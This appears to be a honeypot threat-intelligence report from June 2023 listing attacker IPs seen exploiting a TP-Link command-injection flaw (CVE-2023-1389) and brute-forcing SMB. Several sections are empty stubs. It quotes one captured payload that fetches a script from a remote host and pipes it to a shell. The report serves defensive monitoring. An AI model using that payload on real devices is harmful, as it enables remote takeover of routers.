Our selection of alerts on honeypots: report 12 – june 2023

A good understanding of active threats is necessary to achieve a good security posture. The following report provides actual trends that emerge from the Internet Background Noise. The following data is based on the monitoring of two weeks of our Honeypots logs.

Check out our previous report here.

CVE-2023-1389 exploit attempts

Publicly disclosed mid-March 2023, the CVE-2023-1389 (CVSSv3 : 8.8) refers to TP-Link Archer AX21 which contains a command injection vulnerability that allows remote code execution.

We monitored a spike on our honeypots on the 1st of June.

We recorded 93 IPs used to exploit this vulnerability through port 80/TCP. Here is the top 10:

182.155.241[.]214AS 17809 ( VEE TIME CORP. )TW
211.196.92[.]241AS 4766 ( Korea Telecom )KR
221.163.180[.]245AS 4766 ( Korea Telecom )KR
24.89.68[.]141AS 21804 ( ACCESS-SK )CA
61.79.206[.]56AS 4766 ( Korea Telecom )KR
121.168.207[.]166AS 4766 ( Korea Telecom )KR
72.10.198[.]197AS 36100 ( MTC-BROADBAND )US
14.39.85[.]181AS 4766 ( Korea Telecom )KR
203.217.115[.]226AS 17809 ( VEE TIME CORP. )TW
217.181.189[.]74AS 8399 ( SEWAN SAS )FR

The IP addresses in bold are not known from public databases identifying malicious IP.

Regarding the victims, our European honeypots were mainly targeted (90%), followed by honeypots in Northern and Southern Asia Pacific.

In the TEHTRIS NTA packets, we came across this command-line aimed at exploting this CVE:

  • operation=write&country=$(id>`wget hxxp://cdn2[.]duc3k.com/t -O-|sh

TEHTRIS recommands applying updates per vendor instructions.

Top ports/protocols targeted by threat actors


Most used usernames over SMB protocol

Almost 18 million SMB connection attemps were registered since the beginning of June on our worldwide honeypots network. The usernames most used by threat actors are the following :

The most active IP addresses are not known from public databases identifiying malicious IP :

24.106.191[.]170AS 11426 ( TWC-11426-CAROLINAS )US
178.168.216[.]92AS 25106 ( Mobile TeleSystems JLLC )BY
181.65.138[.]129AS 6147 ( Telefonica del Peru S.A.A. )PE
1.174.10[.]209AS 3462 ( Data Communication Business Group )TW
178.168.214[.]33AS 25106 ( Mobile TeleSystems JLLC )BY
1.174.25[.]188AS 3462 ( Data Communication Business Group )TW
62.162.126[.]218AS 6821 ( Makedonski Telekom AD-Skopje )MK

Log4j – CVE-2021-44228

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

    CVE-2021-41277 exploit attempts

    Want to learn more on this subject?

    More insights on this research issued from the alerts on our worldwide honeypots network.

    Subscribe to our bi-monthly threat intelligence newsletter

      Information remain TEHTRIS sole property and reproduction is forbidden

      TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

      No warranty and liability

      TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.